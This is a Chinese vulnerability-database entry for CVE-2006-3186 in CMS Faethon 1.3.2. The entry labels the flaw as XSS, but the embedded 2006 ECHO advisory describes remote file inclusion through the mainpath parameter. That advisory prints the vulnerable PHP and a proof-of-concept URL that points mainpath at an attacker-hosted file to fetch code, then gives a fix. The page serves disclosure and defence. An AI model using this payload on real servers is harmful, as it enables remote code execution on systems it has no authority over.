CMS Faethon 多个跨站脚本攻击 (XSS) 漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110467 漏洞类型 跨站脚本
发布时间 2006-06-16 更新时间 2006-06-22
CVE编号 CVE-2006-3186 CNNVD-ID CNNVD-200606-435
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/1919
https://www.securityfocus.com/bid/83790
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-435
|漏洞详情
CMSFaethon1.3.2存在多个跨站脚本攻击(XSS)漏洞。远程攻击者可以借助对(1)data/footer.php和(2)admin/header.php的mainpath参数,注入任意Web脚本或HTML。
|漏洞EXP
____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \  
 |    __)_ /    \  \//    ~    \/   |   \ 
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/ 

					.OR.ID
ECHO_ADV_33$2006

---------------------------------------------------------------------------
[ECHO_ADV_33$2006] CMS Faethon 1.3.2 mainpath Remote File Inclusion
---------------------------------------------------------------------------

Author       : M.Hasran Addahroni a.k.a K-159
Date         : June, 16th 2006
Location     : Indonesia, Bali
Web          : http://advisories.echo.or.id/adv/adv33-K-159-2006.txt
Critical Lvl : Highly critical
Impact       : System access
Where        : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
CMS Faethon 

Application : CMS Faethon 
version     : 1.3.2
URL         : http://cmsfaethon.com/
Description :

CMS Faethon is content management system for different web pages.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~

in folder data we found vulnerability script header.php.

-----------------------header.php----------------------
....
<?php
        include($mainpath . 'survey.php');
        ?>
        <h2>RSS - cmsfaethon.com</h2>
        <div class="rss-menu">
                <?php
                $source = 'http://cmsfaethon.com/feed/articles/rss2.php?LangSet=cs';
                include($mainpath . 'rss-reader.php');
        ?>
...
----------------------------------------------------------

Variables $mainpath are not properly sanitized.When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.

Proof Of Concept:
~~~~~~~~~~~~~~~~

http://target.com/[cms_faethon_path]/data/header.php?mainpath=http://attacker.com/evil.txt?

Solution:
~~~~~~~~

sanitize variabel $mainpath in header.php


---------------------------------------------------------------------------
Shoutz:
~~~~~~
~ ping - my dearest wife, for all the luv the tears n the breath 
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous,kaiten
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ sinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit
~ newbie_hacker@yahoogroups.com 
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

# milw0rm.com [2006-06-16]
|受影响的产品
CMS Faethon CMS Faethon 1.3.2
|参考资料

来源:XF
名称:cms-faethon-datafooter-xss(27329)
链接:http://xforce.iss.net/xforce/xfdb/27329
来源:OSVDB
名称:26634
链接:http://www.osvdb.org/26634
来源:VUPEN
名称:ADV-2006-2409
链接:http://www.frsirt.com/english/advisories/2006/2409
来源:SECUNIA
名称:20713
链接:http://secunia.com/advisories/20713
来源:OSVDB
名称:26630
链接:http://www.osvdb.org/26630